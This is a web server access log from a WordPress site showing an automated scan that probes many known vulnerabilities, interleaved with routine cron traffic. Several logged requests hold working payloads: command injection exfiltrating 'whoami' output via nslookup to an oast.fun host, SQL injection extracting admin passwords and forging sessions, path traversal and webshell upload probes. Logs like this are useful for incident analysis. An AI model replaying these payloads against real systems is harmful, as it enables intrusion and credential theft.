165.232.54.158 - - [14/Jan/2026:02:40:17 +0800] "POST /v1/warehouse/pending-events HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:40:34 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.32 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:41:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768329696.6866099834442138671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:41:33 +0800] "GET /_api/web/siteusers HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:41:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768329706.2367200851440429687500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:41:43 +0800] "GET /_api/web/siteusers HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:43:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768329814.6789910793304443359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:43:31 +0800] "POST /cgi-bin/cstecgi.cgi HTTP/1.1" 404 10865 "-" "Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:43:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768329825.2726190090179443359375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:43:42 +0800] "GET /38BtjwjEI2ZdRacWaOvSYdzsY5U HTTP/1.1" 404 10884 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:46:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768330016.6839659214019775390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:46:53 +0800] "GET /bypass/config?type=sqs&keyId=test&key=security&queueUrl=http://d5iu610i9qj8svou82p037tauzg3gufrf.oast.fun/ HTTP/1.1" 404 10861 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:47:00 +0800] "POST /wp-cron.php?doing_wp_cron=1768330020.8207099437713623046875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:46:59 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 21 "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:47:32 +0800] "POST /wp-cron.php?doing_wp_cron=1768330051.9824740886688232421875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:02:47:30 +0800] "POST /?wordfence_syncAttackData=1768330050.4186 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:47:28 +0800] "GET /wp-content/plugins/mstore-api/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:48:54 +0800] "POST /wp-cron.php?doing_wp_cron=1768330134.5139689445495605468750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:48:51 +0800] "GET /getsamplebacklog?arg1=2d0ows2x9anpzaorxi9h4csmai08jjor&arg2=%7b%22type%22%3a%22client%22%2c%22earliest%22%3a%221676976316.328%7c%7cnslookup%20%24(xxd%20-pu%20%3c%3c%3c%20%24(whoami)).d5iu610i9qj8svou82p0sx73fohnodwyx.oast.fun%7c%7cx%22%2c%22latest%22%3a1676976916.328%2c%22origins%22%3a%5b%7b%22ip%22%3a%22nutritaste.com.au%22%2c%22source%22%3a0%7d%5d%2c%22seriesID%22%3a3%7d&arg3=undefined&arg4=undefined&arg5=undefined&arg6=undefined&arg7=undefined HTTP/1.1" 404 10871 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134"
103.4.122.14 - - [14/Jan/2026:02:52:07 +0800] "POST /wp-cron.php?doing_wp_cron=1768330327.7598960399627685546875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:52:04 +0800] "POST /api/router/mesh/status HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:02:52:15 +0800] "GET /wp-json/wp/v2/users HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
103.4.122.14 - - [14/Jan/2026:02:52:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768330338.0938839912414550781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:52:15 +0800] "GET /?rest_route=/wp/v2/users HTTP/1.1" 401 110 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.9 Mobile/15E148 Safari/604.1"
165.232.54.158 - - [14/Jan/2026:02:55:09 +0800] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 400 226 "-" "-"
165.232.54.158 - - [14/Jan/2026:02:55:13 +0800] "POST /wp-json/tdw/save_css HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:56:56 +0800] "POST /wp-cron.php?doing_wp_cron=1768330616.6369159221649169921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:56:53 +0800] "POST /wp-json/api/flutter_user/apple_login HTTP/1.1" 404 117 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.9) Gecko/20100101 Firefox/128.9"
165.232.54.158 - - [14/Jan/2026:02:56:56 +0800] "GET /emby/users/public HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:57:15 +0800] "POST /wp-cron.php?doing_wp_cron=1768330635.2997469902038574218750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:57:12 +0800] "GET /app?service=page/SetupCompleted HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0"
103.4.122.14 - - [14/Jan/2026:02:57:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768330642.2955179214477539062500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:57:19 +0800] "POST /app HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:57:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768330648.2107260227203369140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:57:25 +0800] "POST /app HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:57:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768330654.3290939331054687500000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:57:31 +0800] "POST /app HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:02:57:40 +0800] "POST /wp-cron.php?doing_wp_cron=1768330660.3000590801239013671875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:57:37 +0800] "POST /app HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:02:57:46 +0800] "POST /wp-cron.php?doing_wp_cron=1768330666.3609759807586669921875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:57:43 +0800] "POST /app HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (SS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0"
103.4.122.14 - - [14/Jan/2026:02:57:52 +0800] "POST /wp-cron.php?doing_wp_cron=1768330672.3147830963134765625000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:02:57:49 +0800] "GET /app?service=page/PrinterList HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0"
103.4.122.14 - - [14/Jan/2026:03:00:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768330835.8284978866577148437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:00:32 +0800] "POST /main/webservices/additional_webservices.php HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0"
165.232.54.158 - - [14/Jan/2026:03:00:56 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:01:29 +0800] "POST /Servlet/Skins HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:01:37 +0800] "POST /wp-cron.php?doing_wp_cron=1768330897.1747779846191406250000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:01:35 +0800] "POST /?wordfence_syncAttackData=1768330895.5584 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:01:33 +0800] "GET /38BtjwbNQkaXWO4B9twuD9ZT8Tx.jsp HTTP/1.1" 404 10887 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:03:01:35 +0800] "POST /admin/login.php HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0"
103.4.122.14 - - [14/Jan/2026:03:01:45 +0800] "POST /wp-cron.php?doing_wp_cron=1768330905.3860800266265869140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:01:42 +0800] "GET /admin/dashboard.php HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
165.232.54.158 - - [14/Jan/2026:03:03:49 +0800] "POST /ajax.php?action=save_user HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:03:50 +0800] "POST /wp-cron.php?doing_wp_cron=1768331030.7071440219879150390625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:03:47 +0800] "POST /api/v1/snapshots HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/116.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:03:51 +0800] "POST /?wordfence_syncAttackData=1768331031.4778 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:03:55 +0800] "POST /wp-cron.php?doing_wp_cron=1768331035.9647049903869628906250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:03:53 +0800] "GET /login.php HTTP/1.1" 302 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:03:59 +0800] "POST /wp-cron.php?doing_wp_cron=1768331039.0004138946533203125000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:03:56 +0800] "GET /wp-login.php HTTP/1.1" 200 3204 "https://nutritaste.com.au/login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:04:25 +0800] "POST /wp-cron.php?doing_wp_cron=1768331065.4141030311584472656250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:04:22 +0800] "GET /ws/msw/tenant/'%20union%20select%20(select%20ID%20from%20SGMSDB.DOMAINS)%2C%20''%2C%20''%2C%20''%2C%20''%2C%20''%2C%20(select%20MD5(999999999))%2C''%2C%20''%2C%20' HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:04:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768331076.2763249874114990234375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:04:33 +0800] "POST /goform/aspForm HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:04:43 +0800] "POST /wp-cron.php?doing_wp_cron=1768331083.4609789848327636718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:04:40 +0800] "GET /tvzgeoi HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
165.232.54.158 - - [14/Jan/2026:03:05:52 +0800] "POST /wp-admin/admin-post.php HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:07:44 +0800] "POST /wp-cron.php?doing_wp_cron=1768331264.3205370903015136718750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:07:42 +0800] "POST /?wordfence_syncAttackData=1768331262.6016 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:07:40 +0800] "POST /api/runscript HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:07:51 +0800] "POST /wp-cron.php?doing_wp_cron=1768331271.5431299209594726562500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:07:48 +0800] "GET /_images/hMil4T HTTP/1.1" 404 10862 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:08:14 +0800] "POST /wp-cron.php?doing_wp_cron=1768331294.5078139305114746093750 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:08:11 +0800] "POST /jeecg-boot/jmreport/show HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:03:08:12 +0800] "GET /en/welcomeRes.js HTTP/1.1" 404 10867 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/107.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:08:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768331302.4572279453277587890625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:08:19 +0800] "POST /sdk/ HTTP/1.1" 404 10863 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/121.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:11:36 +0800] "POST /wp-cron.php?doing_wp_cron=1768331496.0267910957336425781250 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
103.4.122.14 - - [14/Jan/2026:03:11:34 +0800] "POST /?wordfence_syncAttackData=1768331494.5121 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:11:32 +0800] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:12:28 +0800] "POST /wp-cron.php?doing_wp_cron=1768331548.3488988876342773437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:12:25 +0800] "GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1" 301 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1"
103.4.122.14 - - [14/Jan/2026:03:12:35 +0800] "POST /wp-cron.php?doing_wp_cron=1768331555.2484610080718994140625 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:12:32 +0800] "GET /appliance/login HTTP/1.1" 404 10861 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0"
103.4.122.14 - - [14/Jan/2026:03:15:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768331723.4932670593261718750000 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:15:20 +0800] "GET /wp-login.php HTTP/1.1" 200 3204 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:03:15:27 +0800] "GET /wp-json/wp/v2/users/ HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:15:34 +0800] "POST /wp-cron.php?doing_wp_cron=1768331734.0678799152374267578125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:15:31 +0800] "GET /?rest_route=/wp/v2/users HTTP/1.1" 401 110 "-" "Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:15:41 +0800] "POST /wp-cron.php?doing_wp_cron=1768331741.0474879741668701171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:15:38 +0800] "GET /feed/ HTTP/1.1" 200 512 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:15:45 +0800] "POST /main/webservices/additional_webservices.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15"
103.4.122.14 - - [14/Jan/2026:03:15:47 +0800] "POST /wp-cron.php?doing_wp_cron=1768331747.6850659847259521484375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:15:44 +0800] "GET /author-sitemap.xml HTTP/1.1" 404 10870 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0"
103.4.122.14 - - [14/Jan/2026:03:17:18 +0800] "POST /wp-cron.php?doing_wp_cron=1768331838.7324368953704833984375 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:17:15 +0800] "GET /wlm/login?next=/wlm HTTP/1.1" 404 10861 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:19:20 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0"
103.4.122.14 - - [14/Jan/2026:03:19:23 +0800] "POST /wp-cron.php?doing_wp_cron=1768331963.8871181011199951171875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:19:20 +0800] "POST /saml/login HTTP/1.1" 404 10861 "-" "Mozilla/5.0 (Debian; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0"
103.4.122.14 - - [14/Jan/2026:03:19:58 +0800] "POST /wp-cron.php?doing_wp_cron=1768331998.7965209484100341796875 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:19:55 +0800] "POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1" 404 10857 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:20:04 +0800] "GET / HTTP/1.1" 200 16720 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.5.2 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:03:20:51 +0800] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15"
172.71.144.48 - - [14/Jan/2026:03:21:05 +0800] "GET /.git/config HTTP/1.1" 403 199 "-" "curl/8.4.0"
165.232.54.158 - - [14/Jan/2026:03:21:41 +0800] "POST /loadfile.lp?pageid=Configure HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15"
165.232.54.158 - - [14/Jan/2026:03:24:00 +0800] "POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%2738BtjvrAUb7TYcCufxzTffelJ02%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+IpAddress=%27165.232.54.158%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%2738BtjvrAUb7TYcCufxzTffelJ02%27%23 HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
165.232.54.158 - - [14/Jan/2026:03:25:36 +0800] "POST /pig/add-pig.php HTTP/1.1" 403 199 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36"
103.4.122.14 - - [14/Jan/2026:03:26:22 +0800] "POST /wp-cron.php?doing_wp_cron=1768332381.9983589649200439453125 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:26:17 +0800] "PUT /PhoneBackup/D8RFn6hJ.php HTTP/1.1" 404 10867 "-" "AVAYA"
103.4.122.14 - - [14/Jan/2026:03:26:31 +0800] "POST /wp-cron.php?doing_wp_cron=1768332391.3571538925170898437500 HTTP/1.1" 200 - "-" "WordPress/6.9; https://nutritaste.com.au"
165.232.54.158 - - [14/Jan/2026:03:26:28 +0800] "GET /PhoneBackup/D8RFn6hJ.php?input=MzhCdGszUjRqeE11WGNzMk55SWJDRHR6Um5W HTTP/1.1" 404 10867 "-" "AVAYA"
165.232.54.158 - - [14/Jan/2026:03:26:49 +0800] "POST /wp-admin/admin-ajax.php?action=htmega_ajax_register HTTP/1.1" 403 6628 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0"
